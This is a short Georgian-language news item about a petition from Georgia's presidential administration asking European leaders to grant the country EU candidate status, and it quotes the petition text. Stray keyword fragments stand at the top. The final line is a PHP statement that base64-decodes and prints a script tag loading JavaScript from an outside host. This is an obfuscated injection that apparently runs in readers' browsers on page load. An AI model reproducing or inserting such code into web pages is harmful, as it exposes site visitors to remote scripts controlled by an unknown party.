celsiusi
ავერსი საქკაბელი

 საქართველოს პრეზიდენტის ადმინისტრაცია ავრცელებს პეტიციას, რომელზე ხელმოწერაც ნებისმიერ მსურველს შეუძლია, როგორც ონლაინ, ისე ადმინისტრაციაში მისვლით.

პეტიციაზე ხელმოწერით საქართველოს მოქალაქეები მიმართავენ ევროპის ლიდერებს, რომ მიანიჭონ საქართველოს კანდიდატის სტატუსი.

„ჩვენ, საქართველოს მოქალაქეები,

მოგმართავთ თქვენ - ევროპის ლიდერებს - დეკემბრის ისტორიულ გადაწყვეტილებამდე. გვსურს მოგაწვდინოთ ჩვენი, ხალხის ერთობლივი ხმა და დაგანახოთ ჩვენი ერთობლივი სულისკვეთება.

მოგმართავთ, მიანიჭოთ ჩვენს ქვეყანას კანდიდატის სტატუსი, თანახმად საქართველოსა და მისი ხალხის მრავალწლიანი მიზანმიმართული სწრაფვისა და ურყევი ნებისა. საქართველოს ხალხის გამოხატული ნება ვერ შეარყია ვერცერთმა ურთულესმა გამოწვევამ - ვერც ომმა და ვერც ოკუპაციამ. ჩვენი წარსულით და საერთო ღირებულებებით დიდი ხანია ერთნი ვართ. მაშასადამე, ჩვენი მომავალი თქვენთანაა, ევროპაშია და ამას ალტერნატივა არ გააჩნია!

საქართველოს კონსტიტუციაში ჩაწერილი პირობის თანახმად, ძალისხმევას არ დავიშურებთ და არაფერს დავაკლებთ ჩვენს მიზანს: სხვადასხვა პოლიტიკური მსოფლმხედველობის მიუხედავად, ერთობის ძალით ხელს ვაწერთ ამ პეტიციას და ვითხოვთ კანდიდატის სტატუსს“, - ნათქვამია პეტიციის ტექსტში, რომლის ხელმომწერთა რიცხვი მუდმივ რეჟიმში იცვლება.

პეტიცია

297
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");